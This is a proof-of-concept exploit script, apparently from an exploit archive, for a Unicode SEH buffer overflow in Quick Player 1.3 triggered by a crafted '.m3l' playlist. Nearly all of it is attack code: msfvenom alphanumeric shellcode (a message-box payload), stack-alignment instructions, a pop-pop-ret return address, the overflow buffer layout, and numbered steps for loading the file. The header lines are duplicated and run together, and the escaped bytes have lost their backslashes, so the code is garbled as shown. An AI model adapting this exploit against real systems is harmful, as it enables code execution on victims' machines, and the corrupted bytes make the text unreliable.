# Date: 2020-06-05
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Quick-Player # Exploit Title: Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)
# Date: 2020-06-05
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html
# Version: 1.3
# Tested on: Windows 7
# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.m3l"
# 2.- Open the application,
# 3.- Click on the bottom-right button with the letters "PL"
# 4.- Select the option "File"
# 5.- Click "Load List"
# 6.- Select poc.m3l
# 7.- Profit
# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Exploiting-Quick-Player/
# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings6/18.gif
# msfvenom -p windows/messagebox TEXT=pwned! -e x86/unicode_mixed -f py EXITFUNC=thread BufferRegister=EAX
# Payload size: 640 bytes
buf = b""
buf += b"x50x50x59x41x49x41x49x41x49x41x49x41x49"
buf += b"x41x49x41x49x41x49x41x49x41x49x41x49x41"
buf += b"x49x41x49x41x49x41x6ax58x41x51x41x44x41"
buf += b"x5ax41x42x41x52x41x4cx41x59x41x49x41x51"
buf += b"x41x49x41x51x41x49x41x68x41x41x41x5ax31"
buf += b"x41x49x41x49x41x4ax31x31x41x49x41x49x41"
buf += b"x42x41x42x41x42x51x49x31x41x49x51x49x41"
buf += b"x49x51x49x31x31x31x41x49x41x4ax51x59x41"
buf += b"x5ax42x41x42x41x42x41x42x41x42x6bx4dx41"
buf += b"x47x42x39x75x34x4ax42x37x69x5ax4bx73x6b"
buf += b"x59x49x71x64x6fx34x69x64x70x31x4ax32x47"
buf += b"x42x61x67x6ex51x35x79x43x34x64x4bx62x51"
buf += b"x4cx70x64x4bx70x76x5ax6cx64x4bx74x36x4d"
buf += b"x4cx44x4bx51x36x4bx58x64x4bx71x6ex6dx50"
buf += b"x64x4bx4dx66x4ex58x70x4fx6bx68x31x65x4a"
buf += b"x53x62x39x49x71x78x51x79x6fx58x61x53x30"
buf += b"x42x6bx52x4cx6bx74x4fx34x52x6bx50x45x6d"
buf += b"x6cx72x6bx6ex74x4cx68x33x48x69x71x4ax4a"
buf += b"x52x6bx70x4ax6ax78x32x6bx31x4ax4dx50x6a"
buf += b"x61x6ax4bx79x53x6ex54x4ex69x44x4bx6fx44"
buf += b"x54x4bx6dx31x5ax4ex6dx61x39x6fx4ex51x69"
buf += b"x30x49x6cx46x4cx45x34x45x70x52x54x7ax67"
buf += b"x35x71x66x6fx5ax6dx49x71x77x57x58x6bx59"
buf += b"x64x4dx6bx73x4cx4dx54x6dx58x32x55x59x51"
buf += b"x34x4bx4fx6ax4bx74x4dx31x6ax4bx71x56x62"
buf += b"x6bx7ax6cx70x4bx34x4bx6ex7ax6dx4cx6bx51"
buf += b"x48x6bx62x6bx5ax64x44x4bx59x71x5ax48x52"
buf += b"x69x71x34x6dx54x4bx6cx71x51x46x63x37x42"
buf += b"x4cx48x6cx69x38x54x62x69x58x65x52x69x79"
buf += b"x32x72x48x44x4ex6ex6ex4cx4ex78x6cx32x32"
buf += b"x5ax48x45x4fx49x6fx49x6fx4bx4fx53x59x71"
buf += b"x35x69x74x77x4bx7ax4fx68x4ex49x50x51x50"
buf += b"x64x47x4bx6cx6cx64x31x42x49x58x52x6ex59"
buf += b"x6fx39x6fx49x6fx62x69x71x35x7ax68x33x38"
buf += b"x30x6cx52x4cx6bx70x4ex61x71x58x4dx63x50"
buf += b"x32x4ex4ex4fx74x52x48x71x65x34x33x32x45"
buf += b"x31x62x4ex50x77x6bx62x68x71x4cx4ex44x4a"
buf += b"x6ax52x69x6bx36x6ex76x79x6fx4fx65x6ax64"
buf += b"x55x39x35x72x72x30x65x6bx56x48x77x32x6e"
buf += b"x6dx75x6cx74x47x6dx4cx4fx34x62x32x5ax48"
buf += b"x51x4fx4bx4fx49x6fx39x6fx73x38x70x6fx71"
buf += b"x68x31x48x4bx70x53x38x50x61x4fx77x43x35"
buf += b"x71x32x51x58x30x4dx30x65x72x53x53x43x6e"
buf += b"x51x57x6bx63x58x6fx6cx6bx74x6ax6ax45x39"
buf += b"x39x53x62x48x71x54x4dx51x6ex78x6dx50x61"
buf += b"x58x70x70x31x67x32x4ex51x55x4dx61x69x39"
buf += b"x72x68x6ex6cx6dx54x4bx56x33x59x48x61x4e"
buf += b"x51x49x42x4fx62x30x53x4ex71x51x42x79x6f"
buf += b"x38x50x6ex51x75x70x32x30x69x6fx32x35x4c"
buf += b"x48x41x41"
alignment = "x54x71" # push esp, padding
alignment += "x58x71" # pop eax, padding
alignment += "x05x20x22" # add eax, 0x22002000
alignment += "x71" # Padding
alignment += "x2Dx19x22" # sub eax, 0x22001900
alignment += "x71" # Padding
alignment += "x50x71" # push eax, padding
alignment += "xC3" # retn
ret = "x71x41" + "xF2x41" # 0x004100f2 : pop esi # pop ebx # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READWRITE} [Quick Player.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.3.0.0 (C:Program FilesQuick PlayerQuick Player.exe)
buffer = "A" * 536 + ret + "x41x71x41x71" + alignment + "A" * 73 + buf + "A" * 200
f = open ("poc.m3l", "w")
f.write(buffer)
f.close()